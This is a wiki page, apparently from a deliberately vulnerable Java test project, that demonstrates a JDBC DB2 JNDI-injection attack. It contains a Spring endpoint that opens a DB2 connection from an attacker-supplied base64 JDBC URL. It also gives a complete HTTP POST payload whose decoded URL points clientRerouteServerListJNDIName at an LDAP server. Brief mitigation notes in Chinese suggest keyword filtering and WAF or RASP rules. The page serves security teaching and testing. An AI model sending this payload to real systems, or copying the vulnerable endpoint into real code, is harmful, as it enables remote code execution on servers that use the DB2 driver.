-
Notifications
You must be signed in to change notification settings - Fork 653
JDBC DB2 Attack
JoyChou edited this page Apr 28, 2023
·
1 revision
@RequestMapping("/db2")
public void db2(String jdbcUrlBase64) throws Exception{
Class.forName("com.ibm.db2.jcc.DB2Driver");
byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
String jdbcUrl = new String(b);
log.info(jdbcUrl);
DriverManager.getConnection(jdbcUrl);
}
postgresql配置:
<dependency>
<groupId>com.ibm.db2</groupId>
<artifactId>jcc</artifactId>
<version>11.5.8.0</version>
</dependency>
payload:
POST /jdbc/db2 HTTP/1.1
Host: sb.dog:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://sb.dog:8080/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,fr;q=0.6
Cookie: JSESSIONID=5E9E0190A2AD8776C4C44D4E35AFEB59; XSRF-TOKEN=ba4ec838-49da-4d02-91a8-bc5d541f6a36; remember-me=YWRtaW46MTY4Mzg2MTQzMTMyODo2NmQ3ZGM0MDQ1NWFlMjAzNDg1YWZjY2ZhNDU5ODQzMQ
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
jdbcUrlBase64=amRiYzpkYjI6Ly8xMjcuMC4wLjE6NTAwMS9CTFVEQjpjbGllbnRSZXJvdXRlU2VydmVyTGlzdEpORElOYW1lPWxkYXA6Ly8xMjcuMC4wLjE6MTM4OS9vYm8wcGQ7
base64解码:
jdbc:db2://127.0.0.1:5001/BLUDB:clientRerouteServerListJNDIName=ldap://127.0.0.1:1389/obo0pd;
目前还没有官方代码层的修复方案,最新版本的db2也未处理该问题,也未提供禁用clientRerouteServerListJNDIName属性的方法。不过可以考虑在代码过滤clientRerouteServerListJNDIName关键字。当然WAF或者RASP也可以添加规则防御。